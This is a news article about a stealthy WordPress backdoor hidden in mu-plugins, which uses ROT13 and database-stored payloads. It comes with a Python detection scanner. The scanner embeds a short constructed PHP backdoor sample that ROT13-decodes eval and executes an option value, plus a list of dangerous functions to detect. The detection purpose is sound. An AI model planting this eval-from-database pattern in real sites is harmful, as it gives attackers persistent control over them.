Stealthy Backdoor in WordPress Plugins Gives Attackers Persistent Access to Websites
A new form of malware targeting WordPress websites has been discovered, hidden within the mu-plugins directory. This stealthy backdoor uses sophisticated techniques, including ROT13 obfuscation and payloads stored in the site's database, to evade detection and maintain persistent access to compromised sites.
The mu-plugins directory in WordPress is typically reserved for “must-use” plugins that load automatically and cannot be disabled through the standard plugin interface. Cybercriminals are exploiting this trusted location to plant malicious code that remains active despite routine security scans.
By employing ROT13, a simple letter substitution cipher, the malware obfuscates its payload, making it less visible to conventional security tools. Additionally, the use of database payloads allows the attackers to store malicious commands and scripts within the site’s database, further embedding their presence beyond the reach of standard file-based detection methods.
The backdoor is triggered through a carefully crafted file named wp-index.php, which acts as a covert gateway. This file enables attackers to interact with the infected website remotely, giving them control for extended periods without raising alarms.
Webmasters and site administrators should remain vigilant, particularly by scrutinising the contents of the mu-plugins directory and monitoring unusual files like wp-index.php. Strengthening security measures, including regular updates and thorough scanning, is essential to prevent such sophisticated threats.
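The checks recommended above can be scripted. The following is an added example written for this article, not code from the report or from WordPress: it walks a mu-plugins directory, ROT13-decodes plain string literals to see whether they hide dangerous PHP function names, flags calls to str_rot13 and references to wp-index.php, and flags files where a value read from the database (get_option or $wpdb) can reach eval. The heuristics, the option name and the two sample files are assumptions constructed for the demonstration.

```python
import codecs
import re
import tempfile
from pathlib import Path

# Hypothetical heuristics written for this article, not code from the report or from
# WordPress; the function names, option name and file layout below are assumptions.
DANGEROUS = {"eval", "assert", "base64_decode", "file_put_contents", "system", "create_function"}
STRING_LIT = re.compile(r"""(['"])([A-Za-z0-9_]{4,})\1""")
DB_READ = re.compile(r"get_option\s*\(|\$wpdb\s*->\s*get_(?:var|row|results)\s*\(")
def scan_source(src: str) -> list[str]:
    """Return findings for one PHP file's contents (empty list means nothing matched)."""
    # ROT13-decode each plain string literal: 'riny' hides eval, 'onfr64_qrpbqr' hides base64_decode
    hidden = {codecs.decode(lit, "rot13") for _, lit in STRING_LIT.findall(src)} & DANGEROUS
    findings = [f"rot13 literal hides {name}" for name in sorted(hidden)]
    if "str_rot13" in src:
        findings.append("calls str_rot13")
    if "wp-index.php" in src:
        findings.append("references wp-index.php")
    # The pattern the article describes: a payload read from the database ends up in eval
    if DB_READ.search(src) and ("eval" in hidden or re.search(r"\beval\s*\(", src)):
        findings.append("database value reaches eval")
    return findings

def scan_mu_plugins(mu_dir: Path) -> dict[str, list[str]]:
    # Map every PHP file under wp-content/mu-plugins to its findings
    report = {}
    for path in sorted(mu_dir.rglob("*.php")):
        hits = scan_source(path.read_text(errors="replace"))
        if path.name == "wp-index.php":
            hits.append("file is named wp-index.php")
        report[str(path.relative_to(mu_dir))] = hits
    return report

# Constructed samples resembling the described technique; not real code from the report.
SAMPLE_BACKDOOR = r"""<?php
$f = str_rot13('riny');                  // riny decodes to eval
$p = get_option('_transient_wp_cache');  // payload kept in the options table
if (file_exists(ABSPATH . 'wp-index.php')) { $f(str_rot13($p)); }
"""
SAMPLE_BENIGN = "<?php\n// loads a site-specific helper\nrequire_once __DIR__ . '/helpers/cache.php';\n"
def demo() -> dict[str, list[str]]:
    # Write both samples into a temporary mu-plugins tree and scan it
    with tempfile.TemporaryDirectory() as tmp:
        mu = Path(tmp) / "mu-plugins"
        mu.mkdir()
        (mu / "wp-index.php").write_text(SAMPLE_BACKDOOR)
        (mu / "site-helpers.php").write_text(SAMPLE_BENIGN)
        return scan_mu_plugins(mu)
```

Run scan_mu_plugins against a real site's wp-content/mu-plugins path and review every file with a non-empty list by hand; the heuristics are meant to surface candidates for inspection, not to prove a file malicious.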
This discovery highlights the ongoing need for enhanced awareness and proactive defence strategies in the WordPress ecosystem to safeguard websites from increasingly stealthy and persistent malware attacks.
Source: Stealthy Backdoor in WordPress Plugins Gives Attackers Persistent Access to Websites
Author: Tushar Subhra Dutta